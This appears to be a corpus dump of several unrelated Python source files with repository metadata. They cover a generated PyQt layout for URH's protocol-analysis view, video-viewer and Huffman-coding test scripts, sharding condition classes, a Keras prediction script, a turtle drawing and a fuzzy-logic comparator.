self.lSearchCurrent = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lSearchCurrent.sizePolicy().hasHeightForWidth())
self.lSearchCurrent.setSizePolicy(sizePolicy)
self.lSearchCurrent.setStyleSheet("QLabel\n"
"{\n"
" qproperty-alignment: AlignCenter;\n"
"}")
self.lSearchCurrent.setObjectName("lSearchCurrent")
self.gridLayout_2.addWidget(self.lSearchCurrent, 0, 4, 1, 1)
self.lSlash = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lSlash.sizePolicy().hasHeightForWidth())
self.lSlash.setSizePolicy(sizePolicy)
self.lSlash.setAlignment(QtCore.Qt.AlignCenter)
self.lSlash.setObjectName("lSlash")
self.gridLayout_2.addWidget(self.lSlash, 0, 5, 1, 1)
self.lSearchTotal = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lSearchTotal.sizePolicy().hasHeightForWidth())
self.lSearchTotal.setSizePolicy(sizePolicy)
self.lSearchTotal.setStyleSheet("QLabel\n"
"{\n"
" qproperty-alignment: AlignCenter;\n"
"}")
self.lSearchTotal.setObjectName("lSearchTotal")
self.gridLayout_2.addWidget(self.lSearchTotal, 0, 6, 1, 1)
self.btnNextSearch = QtWidgets.QToolButton(self.frame_3)
self.btnNextSearch.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnNextSearch.sizePolicy().hasHeightForWidth())
self.btnNextSearch.setSizePolicy(sizePolicy)
self.btnNextSearch.setMaximumSize(QtCore.QSize(20, 16777215))
icon = QtGui.QIcon.fromTheme("go-next")
self.btnNextSearch.setIcon(icon)
self.btnNextSearch.setObjectName("btnNextSearch")
self.gridLayout_2.addWidget(self.btnNextSearch, 0, 7, 1, 1)
spacerItem = QtWidgets.QSpacerItem(60, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_2.addItem(spacerItem, 0, 8, 1, 1)
self.line = QtWidgets.QFrame(self.frame_3)
self.line.setFrameShape(QtWidgets.QFrame.VLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.gridLayout_2.addWidget(self.line, 0, 9, 1, 1)
self.label_2 = QtWidgets.QLabel(self.frame_3)
self.label_2.setObjectName("label_2")
self.gridLayout_2.addWidget(self.label_2, 0, 10, 1, 1)
self.lblRSSI = QtWidgets.QLabel(self.frame_3)
self.lblRSSI.setObjectName("lblRSSI")
self.gridLayout_2.addWidget(self.lblRSSI, 0, 11, 1, 1)
self.line_2 = QtWidgets.QFrame(self.frame_3)
self.line_2.setFrameShape(QtWidgets.QFrame.VLine)
self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_2.setObjectName("line_2")
self.gridLayout_2.addWidget(self.line_2, 0, 12, 1, 1)
self.label_3 = QtWidgets.QLabel(self.frame_3)
self.label_3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_3.setObjectName("label_3")
self.gridLayout_2.addWidget(self.label_3, 0, 13, 1, 1)
self.lTime = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lTime.sizePolicy().hasHeightForWidth())
self.lTime.setSizePolicy(sizePolicy)
self.lTime.setTextFormat(QtCore.Qt.PlainText)
self.lTime.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lTime.setObjectName("lTime")
self.gridLayout_2.addWidget(self.lTime, 0, 14, 1, 1)
self.verticalLayout_3.addLayout(self.gridLayout_2)
self.tblViewProtocol = ProtocolTableView(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tblViewProtocol.sizePolicy().hasHeightForWidth())
self.tblViewProtocol.setSizePolicy(sizePolicy)
self.tblViewProtocol.setAcceptDrops(True)
self.tblViewProtocol.setAutoFillBackground(True)
self.tblViewProtocol.setFrameShape(QtWidgets.QFrame.NoFrame)
self.tblViewProtocol.setFrameShadow(QtWidgets.QFrame.Sunken)
self.tblViewProtocol.setLineWidth(1)
self.tblViewProtocol.setAutoScroll(True)
self.tblViewProtocol.setDragDropMode(QtWidgets.QAbstractItemView.DropOnly)
self.tblViewProtocol.setAlternatingRowColors(True)
self.tblViewProtocol.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.tblViewProtocol.setTextElideMode(QtCore.Qt.ElideNone)
self.tblViewProtocol.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.tblViewProtocol.setHorizontalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.tblViewProtocol.setShowGrid(False)
self.tblViewProtocol.setGridStyle(QtCore.Qt.NoPen)
self.tblViewProtocol.setSortingEnabled(False)
self.tblViewProtocol.setWordWrap(False)
self.tblViewProtocol.setCornerButtonEnabled(False)
self.tblViewProtocol.setObjectName("tblViewProtocol")
self.tblViewProtocol.horizontalHeader().setDefaultSectionSize(40)
self.verticalLayout_3.addWidget(self.tblViewProtocol)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.lBits = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lBits.sizePolicy().hasHeightForWidth())
self.lBits.setSizePolicy(sizePolicy)
self.lBits.setMaximumSize(QtCore.QSize(16777215, 15))
self.lBits.setObjectName("lBits")
self.horizontalLayout_3.addWidget(self.lBits)
self.lBitsSelection = QtWidgets.QLineEdit(self.frame_3)
self.lBitsSelection.setMaximumSize(QtCore.QSize(16777215, 20))
self.lBitsSelection.setAcceptDrops(False)
self.lBitsSelection.setReadOnly(True)
self.lBitsSelection.setObjectName("lBitsSelection")
self.horizontalLayout_3.addWidget(self.lBitsSelection)
self.lHex = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lHex.sizePolicy().hasHeightForWidth())
self.lHex.setSizePolicy(sizePolicy)
self.lHex.setMaximumSize(QtCore.QSize(16777215, 15))
self.lHex.setObjectName("lHex")
self.horizontalLayout_3.addWidget(self.lHex)
self.lHexSelection = QtWidgets.QLineEdit(self.frame_3)
self.lHexSelection.setMaximumSize(QtCore.QSize(16777215, 20))
self.lHexSelection.setAcceptDrops(False)
self.lHexSelection.setReadOnly(True)
self.lHexSelection.setObjectName("lHexSelection")
self.horizontalLayout_3.addWidget(self.lHexSelection)
self.lDecimal = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lDecimal.sizePolicy().hasHeightForWidth())
self.lDecimal.setSizePolicy(sizePolicy)
self.lDecimal.setMaximumSize(QtCore.QSize(16777215, 15))
self.lDecimal.setObjectName("lDecimal")
self.horizontalLayout_3.addWidget(self.lDecimal)
self.lDecimalSelection = QtWidgets.QLineEdit(self.frame_3)
self.lDecimalSelection.setMaximumSize(QtCore.QSize(16777215, 20))
self.lDecimalSelection.setAcceptDrops(False)
self.lDecimalSelection.setReadOnly(True)
self.lDecimalSelection.setObjectName("lDecimalSelection")
self.horizontalLayout_3.addWidget(self.lDecimalSelection)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem1)
self.lNumSelectedColumns = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lNumSelectedColumns.sizePolicy().hasHeightForWidth())
self.lNumSelectedColumns.setSizePolicy(sizePolicy)
self.lNumSelectedColumns.setObjectName("lNumSelectedColumns")
self.horizontalLayout_3.addWidget(self.lNumSelectedColumns)
self.lColumnsSelectedText = QtWidgets.QLabel(self.frame_3)
self.lColumnsSelectedText.setObjectName("lColumnsSelectedText")
self.horizontalLayout_3.addWidget(self.lColumnsSelectedText)
self.verticalLayout_3.addLayout(self.horizontalLayout_3)
self.verticalLayout_4.addWidget(self.splitter_2)
self.frame = QtWidgets.QFrame(self.splitter)
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.gridLayout = QtWidgets.QGridLayout(self.frame)
self.gridLayout.setObjectName("gridLayout")
self.label = QtWidgets.QLabel(self.frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.tblLabelValues = LabelValueTableView(self.frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tblLabelValues.sizePolicy().hasHeightForWidth())
self.tblLabelValues.setSizePolicy(sizePolicy)
self.tblLabelValues.setAlternatingRowColors(True)
self.tblLabelValues.setShowGrid(False)
self.tblLabelValues.setObjectName("tblLabelValues")
self.tblLabelValues.horizontalHeader().setVisible(True)
self.tblLabelValues.horizontalHeader().setCascadingSectionResizes(False)
self.tblLabelValues.horizontalHeader().setDefaultSectionSize(150)
self.tblLabelValues.horizontalHeader().setStretchLastSection(True)
self.tblLabelValues.verticalHeader().setVisible(False)
self.gridLayout.addWidget(self.tblLabelValues, 1, 1, 2, 1)
self.listViewLabelNames = ProtocolLabelListView(self.frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.listViewLabelNames.sizePolicy().hasHeightForWidth())
self.listViewLabelNames.setSizePolicy(sizePolicy)
self.listViewLabelNames.setAcceptDrops(False)
self.listViewLabelNames.setObjectName("listViewLabelNames")
self.gridLayout.addWidget(self.listViewLabelNames, 2, 0, 1, 1)
self.lblLabelValues = QtWidgets.QLabel(self.frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lblLabelValues.sizePolicy().hasHeightForWidth())
self.lblLabelValues.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.lblLabelValues.setFont(font)
self.lblLabelValues.setAlignment(QtCore.Qt.AlignCenter)
self.lblLabelValues.setObjectName("lblLabelValues")
self.gridLayout.addWidget(self.lblLabelValues, 0, 1, 1, 1)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.cbMessagetypes = QtWidgets.QComboBox(self.frame)
self.cbMessagetypes.setEditable(True)
self.cbMessagetypes.setInsertPolicy(QtWidgets.QComboBox.NoInsert)
self.cbMessagetypes.setObjectName("cbMessagetypes")
self.horizontalLayout.addWidget(self.cbMessagetypes)
self.btnMessagetypeSettings = QtWidgets.QToolButton(self.frame)
icon = QtGui.QIcon.fromTheme("preferences-other")
self.btnMessagetypeSettings.setIcon(icon)
self.btnMessagetypeSettings.setObjectName("btnMessagetypeSettings")
self.horizontalLayout.addWidget(self.btnMessagetypeSettings)
self.btnAddMessagetype = QtWidgets.QToolButton(self.frame)
icon = QtGui.QIcon.fromTheme("list-add")
self.btnAddMessagetype.setIcon(icon)
self.btnAddMessagetype.setObjectName("btnAddMessagetype")
self.horizontalLayout.addWidget(self.btnAddMessagetype)
self.btnRemoveMessagetype = QtWidgets.QToolButton(self.frame)
icon = QtGui.QIcon.fromTheme("list-remove")
self.btnRemoveMessagetype.setIcon(icon)
self.btnRemoveMessagetype.setObjectName("btnRemoveMessagetype")
self.horizontalLayout.addWidget(self.btnRemoveMessagetype)
self.gridLayout.addLayout(self.horizontalLayout, 1, 0, 1, 1)
self.verticalLayout_2.addWidget(self.splitter)
self.retranslateUi(FAnalysis)
self.stackedWidgetLogicAnalysis.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(FAnalysis)
def retranslateUi(self, FAnalysis):
_translate = QtCore.QCoreApplication.translate
FAnalysis.setWindowTitle(_translate("FAnalysis", "Frame"))
self.label_5.setText(_translate("FAnalysis", "Protocols:"))
self.btnSaveProto.setText(_translate("FAnalysis", "Save current protocol.."))
self.label_4.setText(_translate("FAnalysis", "Participants:"))
self.cbProtoView.setToolTip(_translate("FAnalysis", "<html><head/><body><p>Set the desired view here.</p></body></html>"))
self.cbProtoView.setItemText(0, _translate("FAnalysis", "Bits"))
self.cbProtoView.setItemText(1, _translate("FAnalysis", "Hex"))
self.cbProtoView.setItemText(2, _translate("FAnalysis", "ASCII"))
self.cbDecoding.setItemText(0, _translate("FAnalysis", "NRZ"))
self.cbDecoding.setItemText(1, _translate("FAnalysis", "Manchester"))
self.cbDecoding.setItemText(2, _translate("FAnalysis", "Manchester II"))
self.cbDecoding.setItemText(3, _translate("FAnalysis", "Differential Manchester"))
self.cbDecoding.setItemText(4, _translate("FAnalysis", "..."))
self.lEncodingErrors.setText(_translate("FAnalysis", "Decoding errors for message:"))
self.lDecodingErrorsValue.setText(_translate("FAnalysis", "0 (0.00%) "))
self.labelDecodingState.setText(_translate("FAnalysis", "SUCCESS"))
self.cbShowDiffs.setText(_translate("FAnalysis", "Mark diffs in protocol"))
self.chkBoxShowOnlyDiffs.setText(_translate("FAnalysis", "Show only diffs in protocol"))
self.chkBoxOnlyShowLabelsInProtocol.setText(_translate("FAnalysis", "Show only labels in protocol"))
self.btnAnalyze.setText(_translate("FAnalysis", "Analyze"))
self.lineEditSearch.setPlaceholderText(_translate("FAnalysis", "Search Pattern"))
self.btnSearchSelectFilter.setText(_translate("FAnalysis", "Search"))
self.lFilterShown.setText(_translate("FAnalysis", "shown: 42/108"))
self.btnPrevSearch.setText(_translate("FAnalysis", "<"))
self.lSearchCurrent.setText(_translate("FAnalysis", "-"))
self.lSlash.setText(_translate("FAnalysis", "/"))
self.lSearchTotal.setText(_translate("FAnalysis", "-"))
self.btnNextSearch.setText(_translate("FAnalysis", ">"))
self.label_2.setToolTip(_translate("FAnalysis", "<html><head/><body><p>The <span style=\" font-weight:600;\">Received Signal Strength Indicator</span> indicates the average signal power of the current message.</p></body></html>"))
self.label_2.setText(_translate("FAnalysis", "RSSI:"))
self.lblRSSI.setToolTip(_translate("FAnalysis", "<html><head/><body><p>The <span style=\" font-weight:600;\">Received Signal Strength Indicator</span> indicates the average signal power of the current message.</p></body></html>"))
self.lblRSSI.setText(_translate("FAnalysis", "1.04"))
self.label_3.setToolTip(_translate("FAnalysis", "<html><head/><body><p>The <span style=\" font-weight:600;\">Message Start</span> is the point in time when a protocol message begins. Additionally the relative time (+ ...) from the previous message is shown.</p></body></html>"))
self.label_3.setText(_translate("FAnalysis", "Timestamp:"))
self.lTime.setToolTip(_translate("FAnalysis", "<html><head/><body><p>The <span style=\" font-weight:600;\">Message</span><span style=\" font-weight:600;\">Start</span> is the point in time when a protocol message begins. Additionally the relative time (+ ...) from the previous message is shown.</p></body></html>"))
self.lTime.setText(_translate("FAnalysis", "0 (+0)"))
self.lBits.setText(_translate("FAnalysis", "Bit:"))
self.lHex.setText(_translate("FAnalysis", "Hex:"))
self.lDecimal.setText(_translate("FAnalysis", "Decimal:"))
self.lNumSelectedColumns.setText(_translate("FAnalysis", "0"))
self.lColumnsSelectedText.setText(_translate("FAnalysis", "Column(s) selected"))
self.label.setText(_translate("FAnalysis", "Message type:"))
self.listViewLabelNames.setToolTip(_translate("FAnalysis", "Manage your estimations for protocol fields here. To add custom field types use Rightclick -> Edit."))
self.lblLabelValues.setText(_translate("FAnalysis", "Label values for message"))
self.btnMessagetypeSettings.setToolTip(_translate("FAnalysis", "Settings for message type"))
self.btnMessagetypeSettings.setText(_translate("FAnalysis", "..."))
self.btnAddMessagetype.setToolTip(_translate("FAnalysis", "Add a new message type"))
self.btnAddMessagetype.setText(_translate("FAnalysis", "..."))
self.btnRemoveMessagetype.setToolTip(_translate("FAnalysis", "Delete current message type"))
self.btnRemoveMessagetype.setText(_translate("FAnalysis", "..."))
from urh.ui.views.LabelValueTableView import LabelValueTableView
from urh.ui.views.ProtocolLabelListView import ProtocolLabelListView
from urh.ui.views.ProtocolTableView import ProtocolTableView
from urh.ui.views.ProtocolTreeView import ProtocolTreeView
from . import urh_rc
| 2.015625 | 2 |
view_all_videos.py | ethall/LED-Timeline | 1 | 12798007 | <filename>view_all_videos.py
import os
import cv2 as cv
from _util import Scrubber, get_frames
from p01_extract_valid_frames import extract_valid_frames
from p02_denoise import denoise
from p03_gray import to_grayscale
from p04_diff import to_intensity_difference
if not os.path.exists("target_p01_valid.mp4"):
extract_valid_frames("target.mp4", "target_p01_valid.mp4")
color_movie_viewer = Scrubber(
get_frames(cv.VideoCapture("target_p01_valid.mp4")), window_title="color"
)
color_movie_viewer.create()
color_movie_viewer.wait()
if not os.path.exists("target_p02_denoised.mp4"):
denoise("target_p01_valid.mp4", "target_p02_denoised.mp4")
denoised_color_movie_viewer = Scrubber(
get_frames(cv.VideoCapture("target_p02_denoised.mp4")), window_title="denoised color"
)
denoised_color_movie_viewer.create()
denoised_color_movie_viewer.wait()
if not os.path.exists("target_p03_gray.mp4"):
to_grayscale("target_p02_denoised.mp4", "target_p03_gray.mp4")
gray_movie_viewer = Scrubber(
get_frames(cv.VideoCapture("target_p03_gray.mp4")), window_title="gray"
)
gray_movie_viewer.create()
gray_movie_viewer.wait()
if not os.path.exists("target_p04_diff.mp4"):
to_intensity_difference("target_p03_gray.mp4", "target_p04_diff.mp4")
scaled_diff_viewer = Scrubber(
get_frames(cv.VideoCapture("target_p04_diff.mp4")), window_title="scaled diff"
)
scaled_diff_viewer.create()
scaled_diff_viewer.wait()
if not os.path.exists("target_p05_detect.mp4"):
print("Skipping part 5: video does not exist")
print("It can be created by running the 'p05_detect.py' script")
else:
gray_movie_viewer = Scrubber(
get_frames(cv.VideoCapture("target_p05_detect.mp4")), window_title="detect"
)
gray_movie_viewer.create()
gray_movie_viewer.wait()
| 2.765625 | 3 |
slash/core/runnable_test_factory.py | omergertel/slash | 0 | 12798008 | from .metadata import Metadata
class RunnableTestFactory(object):
def __init__(self, file_path='', module_name='', factory_name=''):
super(RunnableTestFactory, self).__init__()
self.file_path = file_path
self.module_name = module_name
self.factory_name = factory_name
def generate_tests(self, fixture_store):
"""
Generates :class:`.RunnableTest` instances to run
Do not override this method directly. Use :func:`.RunnableTestFactory._generate_tests` instead.
"""
for address_in_factory, test in self._generate_tests(fixture_store):
assert test.__slash__ is None
test.__slash__ = Metadata(self, test, address_in_factory)
yield test
def _generate_tests(self, fixture_store):
raise NotImplementedError() # pragma: no cover
| 2.4375 | 2 |
shardingpy/parsing/parser/context/condition.py | hongfuli/sharding-py | 1 | 12798009 | # -*- coding: utf-8 -*-
from collections import OrderedDict, defaultdict
from shardingpy.api.algorithm.sharding.values import ListShardingValue, RangeShardingValue
from shardingpy.constant import ShardingOperator
from shardingpy.exception import UnsupportedOperationException
from shardingpy.parsing.parser.expressionparser import SQLPlaceholderExpression, SQLTextExpression, SQLNumberExpression
from shardingpy.util.extype import RangeType, Range
from shardingpy.util.strutil import equals_ignore_case
class Column:
def __init__(self, name, table_name):
self.name = name
self.table_name = table_name
def __eq__(self, other):
return other and isinstance(other, Column) and equals_ignore_case(self.name, other.name) and equals_ignore_case(
self.table_name, other.table_name)
def __hash__(self):
return hash(self.name) + 17 * hash(self.table_name) if self.table_name else 0
class Condition:
def __init__(self, column, operator, *sql_expressions):
if column:
assert isinstance(column, Column)
if operator:
assert isinstance(operator, ShardingOperator)
self.column = column
self.operator = operator
self._position_index_map = OrderedDict()
self._values = list()
position = 0
for expr in sql_expressions:
if isinstance(expr, SQLPlaceholderExpression):
self._position_index_map[position] = expr.index
elif isinstance(expr, SQLTextExpression):
self._values.append(expr.text)
elif isinstance(expr, SQLNumberExpression):
self._values.append(expr.number)
position += 1
# Deprecated
def get_sharding_value(self, parameters):
condition_values = self.get_condition_values(parameters)
if self.operator in [ShardingOperator.EQUAL, ShardingOperator.IN]:
return ListShardingValue(self.column.table_name, self.column.name, condition_values)
elif self.operator == ShardingOperator.BETWEEN:
return RangeShardingValue(self.column.table_name, self.column.name,
Range(condition_values[0], RangeType.CLOSED, condition_values[1],
RangeType))
else:
raise UnsupportedOperationException("sharding condition not support :" + self.operator.value)
def get_condition_values(self, parameters):
result = self._values[:]
for position, param_index in self._position_index_map.items():
parameter = parameters[param_index]
if position < len(result):
result.insert(position, parameter)
else:
result.append(parameter)
return result
class AndCondition(object):
def __init__(self):
self.conditions = list()
def get_conditions_map(self):
result = defaultdict(list)
for each in self.conditions:
result[each.column].append(each)
return result
def optimize(self):
result = AndCondition()
result.conditions = [each for each in self.conditions if type(each) == Condition]
if not result.conditions:
result.conditions.append(NullCondition())
return result
class OrCondition(object):
def __init__(self, condition=None):
self.and_conditions = list()
if condition:
self.add(condition)
def add(self, condition):
assert isinstance(condition, Condition)
if len(self.and_conditions) == 0:
self.and_conditions.append(AndCondition())
self.and_conditions[0].conditions.append(condition)
def find(self, column, index):
pass
class Conditions:
def __init__(self, conditions=None):
self.or_condition = OrCondition()
if conditions:
self.or_condition.and_conditions.extend(conditions.or_condition.and_conditions)
def add(self, condition, sharding_rule):
if sharding_rule.is_sharding_column(condition.column):
self.or_condition.add(condition)
class NullCondition(Condition):
def __init__(self):
super().__init__(None, None)
class GeneratedKeyCondition(Condition):
def __init__(self, column, index, value):
super().__init__(column, ShardingOperator.EQUAL, SQLNumberExpression(value))
self.index = index
self.value = value
def get_condition_values(self, parameters):
return [self.value] if self.value is not None else [parameters[self.index]]
| 2.265625 | 2 |
predict.py | Muxxs/SocialModel | 0 | 12798010 | <filename>predict.py
# coding=utf-8
import tensorflow as tf
import random
def get_data(nums):
import os
x_train = [] # 4*1
y_train = [] # 1*1
for i in range(nums):
NewList = []
for m in list([0, 1, 2, 3]):
NewList.append(random.random() // 0.1)
x_train.append(NewList)
return x_train
x_train = get_data(10)
x_train.append([1, 1, 1, 1])
x_train.append([2, 2, 2, 2])
model = tf.keras.models.load_model('my_model')
r = model.predict(x_train)
for i in range(len(r)):
print(x_train[i][0] + x_train[i][1] + x_train[i][2] + x_train[i][3],
int(x_train[i][0] + x_train[i][1] + x_train[i][2] + x_train[i][3] > 20), int(r[i][0] < r[i][1]), r[i][0],
r[i][1])
| 2.828125 | 3 |
wowheadquesttracker/helix.py | LairdStreak/MyPyPlayGround | 0 | 12798011 | <gh_stars>0
# Python program to draw
# Spiral Helix Pattern
# using Turtle Programming
import turtle
loadWindow = turtle.Screen()
turtle.speed(2)
for i in range(100):
turtle.circle(5*i)
turtle.circle(-5*i)
turtle.left(i)
turtle.exitonclick() | 3.90625 | 4 |
test/test_huffman.py | fat-crocodile/comression | 1 | 12798012 | import sys
sys.path.insert(0, '../src')
from prefix_code import Encoder, Decoder
from huffman import make_code_symbols as make_code
from bounded_huffman import make_code_symbols as make_ll_code # ll for lenght-limited
class DummyInputStream(object):
def __init__(self, data):
self.data = iter(data)
def get_be(self, n):
res = 0
for _ in xrange(n):
b = self.data.next()
res *= 2
if b == '1': res += 1
elif b == '0': pass
else: raise Exception('Wrong input format')
return res
class DummyOutputStream(object):
def __init__(self):
self.buffer = []
def put_be(self, v, n):
res = []
for _ in xrange(n):
res.append('1' if v % 2 else '0')
v /= 2
res.reverse()
self.buffer.extend(res)
def display_char(c):
code = ord(c)
if c == '\n': return '\\n'
if c == '\t': return '\\t'
if c == '\r': return '\\r'
if c == ' ': return "' '"
if code > 32 and code < 128:
return c
return '0x%02x' % code
def display_list(l):
columns = 4
items = ['%s --> %3s' % (display_char(c), i) for c,i in l if i > 0]
rows = [[] for _ in range((len(items) + columns - 1) / columns)]
try:
ii = iter(items)
while True:
for r in rows:
r.append(ii.next())
except StopIteration:
pass
res = ['\t'.join(r) for r in rows]
return '\n'.join(res)
def test_coder(name, data, code):
encoder = Encoder(code)
dos = DummyOutputStream()
for x in data:
encoder.put(dos, x)
print name
print ''.join(dos.buffer)
print len(dos.buffer)
dis = DummyInputStream(dos.buffer)
decoder = Decoder(code)
res = []
try:
while True:
res.append(decoder.get(dis))
except StopIteration:
pass
if ''.join(res) == data:
print 'Decoded'
else:
print 'Error!'
data = sys.stdin.read()
counts = dict.fromkeys([chr(i) for i in range(256)], 0)
for x in data:
counts[x] += 1
counts = sorted(counts.iteritems())
print 'Counts:\n%s' % display_list(counts)
symbols = sum((c for _,c in counts), 0)
weights = [c * 1.0 / symbols for _,c in counts]
codeu = make_code(counts)
code16 = make_ll_code(counts, 16)
code10 = make_ll_code(counts, 10)
code8 = make_ll_code(counts, 8)
code6 = make_ll_code(counts, 6)
print 'Unlimited code (weighted lenght %s):\n%s' % (sum((w * l for w,(_,l) in zip(weights, codeu)), 0), display_list(codeu))
print 'code-16 (weighted lenght %s):\n%s' % (sum((w * l for w,(_,l) in zip(weights, code16)), 0), display_list(code16))
print 'code-10 (weighted lenght %s):\n%s' % (sum((w * l for w,(_,l) in zip(weights, code10)), 0), display_list(code10))
print 'code-8 (weighted lenght %s):\n%s' % (sum((w * l for w,(_,l) in zip(weights, code8)), 0), display_list(code8))
print 'code-6 (weighted lenght %s):\n%s' % (sum((w * l for w,(_,l) in zip(weights, code6)), 0), display_list(code6))
test_coder('unlimited', data, codeu)
test_coder('code-16', data, code16)
test_coder('code-10', data, code10)
test_coder('code-8', data, code8)
test_coder('code-6', data, code6)
| 2.796875 | 3 |
robotice/utils/extensions/comparators/fuzzy/base.py | robotice/robotice | 2 | 12798013 |
import re
import logging
from time import time
from datetime import datetime
from celery.task import task
from celery.execute import send_task
from celery.signals import celeryd_after_setup
from robotice.reactor.tasks import commit_action
from robotice.reasoner.comparators import BaseComparator
logger = logging.getLogger(__name__)
R_FCL_PATH = "/srv/robotice/config/fuzzy"
FCL_VAR = "fcl"
class FuzzyComparator(BaseComparator):
"""Object for handling fuzzy reasoning
"""
def compare(self):
for actuator in self.config.actuators:
system = actuator.get('system_name').replace(".", "_")
plan_name = actuator["plan_name"]
fcl_file = actuator.get(FCL_VAR, None)
if not fcl_file:
logger.info("Actuator has not specified FCL set, will be ignored.")
continue
model_value, real_value = self.get_values(actuator)
logger.info("key: {0} model_value: {1} | real_value: {2}".format(
('%s.%s.%s' % (system, 'sensors', plan_name)), model_value, real_value))
"""
if real_value == None:
logger.info('NO REAL DATA to COMPARE')
missing_data += 1
continue
"""
# try load pyfuzzy
try:
import fuzzy.storage.fcl.Reader
except Exception, e:
logger.error("Missing pyfuzzy library. Maybe pip install pyfuzzy fix this issue. Original exception: {0}".format(e))
raise e # cannot continue
# load FCL file
fcl_file = ".".join([fcl_file, "fcl"])
fcl_path = "/".join([R_FCL_PATH, fcl_file])
try:
fuzy_system = fuzzy.storage.fcl.Reader.Reader().load_from_file(fcl_path)
except Exception, e:
logger.warning("Cannot load FCL file {0} in {1} path.".format(fcl_file, fcl_path))
# process FCL and get action
logger.info("Ready to FCL calculate")
try:
inputs = {
"input": real_value,
}
output = {
"action": 0.0
}
action = fuzy_system.calculate(inputs, output)["action"]
logger.info(action)
except Exception, e:
raise e
"""
actuator_device = self.config.get_actuator_device(actuator)
logger.info(actuator_device)
actuator.update(actuator_device)
logger.info(actuator)
"""
return "Fuzzy comparator emit 0 actions." | 2.1875 | 2 |
src/model/ca_mtl.py | Daupler/CA-MTL | 0 | 12798014 | import re
import logging
